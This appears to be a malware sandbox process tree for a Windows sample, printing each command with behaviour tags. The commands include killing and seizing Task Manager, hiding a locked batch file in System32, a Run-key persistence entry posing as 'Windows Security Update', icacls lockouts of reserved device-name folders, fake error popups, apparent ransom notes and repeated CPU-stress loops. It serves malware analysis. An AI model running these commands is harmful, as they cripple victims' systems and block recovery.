C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F23⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F23⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F23⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F23⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F23⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F23⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\Desktop\LPT2"23⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"23⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\cscript.execscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs23⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat24⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat25⤵
-
C:\Windows\system32\msg.exemsg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"26⤵
-
-
C:\Windows\system32\net.exenet session26⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session27⤵
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe26⤵
- Kills process with taskkill
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\taskmgr.exe26⤵
- Modifies file permissions
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\taskmgr.exe26⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\taskmgr.exe /grant administrators:F26⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F26⤵
-
-
C:\Windows\system32\attrib.exeattrib +s +h +r "C:\Windows\System32\flare.bat"26⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)26⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)26⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)26⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f26⤵
-
-
C:\Windows\system32\cmd.execmd.exe26⤵
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\flare_warning.txt"26⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F26⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F26⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F26⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F26⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F26⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F26⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F26⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F26⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F26⤵
- Modifies file permissions
-
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\Desktop\LPT2"26⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"26⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\cscript.execscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs26⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat27⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat28⤵
-
C:\Windows\system32\msg.exemsg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"29⤵
-
-
C:\Windows\system32\net.exenet session29⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session30⤵
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe29⤵
- Kills process with taskkill
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\taskmgr.exe29⤵
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\taskmgr.exe29⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\taskmgr.exe /grant administrators:F29⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F29⤵
-
-
C:\Windows\system32\attrib.exeattrib +s +h +r "C:\Windows\System32\flare.bat"29⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)29⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)29⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)29⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f29⤵
-
-
C:\Windows\system32\cmd.execmd.exe29⤵
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\flare_warning.txt"29⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F29⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F29⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F29⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F29⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F29⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F29⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F29⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F29⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F29⤵
-
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\Desktop\LPT2"29⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"29⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\cscript.execscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs29⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat30⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat31⤵
-
C:\Windows\system32\msg.exemsg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"32⤵
-
-
C:\Windows\system32\net.exenet session32⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session33⤵
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe32⤵
- Kills process with taskkill
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\taskmgr.exe32⤵
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\taskmgr.exe32⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\taskmgr.exe /grant administrators:F32⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F32⤵
-
-
C:\Windows\system32\attrib.exeattrib +s +h +r "C:\Windows\System32\flare.bat"32⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)32⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)32⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)32⤵
- Modifies file permissions
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f32⤵
-
-
C:\Windows\system32\cmd.execmd.exe32⤵
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\flare_warning.txt"32⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F32⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F32⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F32⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F32⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F32⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F32⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F32⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F32⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F32⤵
-
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\Desktop\LPT2"32⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"32⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\cscript.execscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs32⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat33⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat34⤵
-
C:\Windows\system32\msg.exemsg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"35⤵
-
-
C:\Windows\system32\net.exenet session35⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session36⤵
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe35⤵
- Kills process with taskkill
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\taskmgr.exe35⤵
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\taskmgr.exe35⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\taskmgr.exe /grant administrators:F35⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F35⤵
-
-
C:\Windows\system32\attrib.exeattrib +s +h +r "C:\Windows\System32\flare.bat"35⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)35⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)35⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)35⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f35⤵
-
-
C:\Windows\system32\cmd.execmd.exe35⤵
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\flare_warning.txt"35⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F35⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F35⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F35⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F35⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F35⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F35⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F35⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F35⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F35⤵
- Modifies file permissions
-
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\Desktop\LPT2"35⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"35⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\cscript.execscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs35⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat36⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat37⤵
-
C:\Windows\system32\msg.exemsg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"38⤵
-
-
C:\Windows\system32\net.exenet session38⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session39⤵
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe38⤵
- Kills process with taskkill
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\taskmgr.exe38⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\taskmgr.exe38⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\taskmgr.exe /grant administrators:F38⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F38⤵
-
-
C:\Windows\system32\attrib.exeattrib +s +h +r "C:\Windows\System32\flare.bat"38⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)38⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)38⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)38⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f38⤵
-
-
C:\Windows\system32\cmd.execmd.exe38⤵
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Desktop\flare_warning.txt"38⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F38⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F38⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F38⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F38⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F38⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F38⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F38⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F38⤵
-
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F38⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\Desktop\LPT2"38⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"35⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 135⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"35⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 135⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"35⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 135⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"35⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 135⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"32⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 132⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"32⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 132⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"32⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 132⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"32⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 132⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"32⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 132⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"32⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 132⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"32⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 132⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"32⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 132⤵
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"29⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 129⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"29⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 129⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"29⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 129⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"29⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 129⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"29⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 129⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"29⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 129⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"29⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 129⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"29⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 129⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"29⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 129⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"29⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 129⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"29⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 129⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"29⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 129⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"29⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 129⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"26⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 126⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"26⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 126⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"26⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 126⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"26⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 126⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"26⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 126⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"26⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 126⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"26⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 126⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"26⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 126⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"26⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 126⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"26⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 126⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"26⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 126⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"26⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 126⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"26⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 126⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"26⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 126⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"26⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 126⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"26⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 126⤵
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"23⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 123⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"23⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 123⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"23⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 123⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"23⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 123⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"23⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 123⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"23⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 123⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"23⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 123⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"23⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 123⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"23⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 123⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"23⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 123⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"23⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 123⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"23⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 123⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"23⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 123⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"23⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 123⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"23⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 123⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"23⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 123⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"23⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 123⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"23⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 123⤵
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"20⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 120⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"20⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 120⤵
-
-
C:\Windows\system32\cmd.execmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"20⤵
-
-
